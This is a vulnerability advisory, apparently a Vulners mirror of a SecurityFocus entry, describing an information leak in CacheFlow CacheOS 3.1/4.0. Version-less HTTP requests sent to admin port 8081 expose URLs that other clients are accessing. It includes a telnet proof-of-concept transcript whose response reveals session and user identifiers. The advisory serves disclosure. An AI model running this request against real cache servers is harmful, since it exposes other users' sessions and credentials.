Cacheflow CacheOS 3.1/4.0 Web Administration Arbitrary Cached Page Code Leakage Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType

Cacheflow CacheOS 3.1/4.0 Web Administration Arbitrary Cached Page Code Leakage Vulnerabilit


                                                source: http://www.securityfocus.com/bid/3841/info

CacheOS is the firmware designed and distributed with CacheFlow web cache systems. It is maintained and distributed by CacheFlow.

When a user connects to the system via the web administration interface on port 8081, and issues an HTTP standard-compliant request to the system, the system will prevent the user from accessing any information managed by the cache server. However, a user connecting to the system and issuing a request without the HTTP version request type (i.e. HTTP/1.0 or HTTP/1.1) multiple times may gain access to sensitive information. The cache server will leak information such as parts of URLs being accessed by a client currently connected to the cache server.

This problem makes it possible for a user to gather information, and potentially gain access to passwords, userids, or other potentially sensitive information. 

localhost:~# telnet cacheflow 8081
Trying xxx.xxx.xxx.xxx...
Connected to cacheflow.
Escape character is &#39;^]&#39;.
GET /Secure/Local/console/cmhome.htm

HTTP/1.0 404-Not Found

&#60;HEAD&#62;&#60;TITLE&#62;404 Not Found&#60;/TITLE&#62;&#60;/HEAD&#62;&#60;BODY&#62;&#60;H1&#62;404 Not Found&#60;/H1&#62;The
request
ed URL &#34;/Secure/Local/console/cmhome.htm

Easp&o=0&sv=za5cb0d78&qid=E2BCA8F417ECE94DBDD27B75F951FFDA&uid=2c234acbec234
acbe
&sid=3c234acbec234acbe&ord=1&#34; was not found on this
server.&#60;P&#62;&#60;/BODY&#62;Connection
closed by foreign host.

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1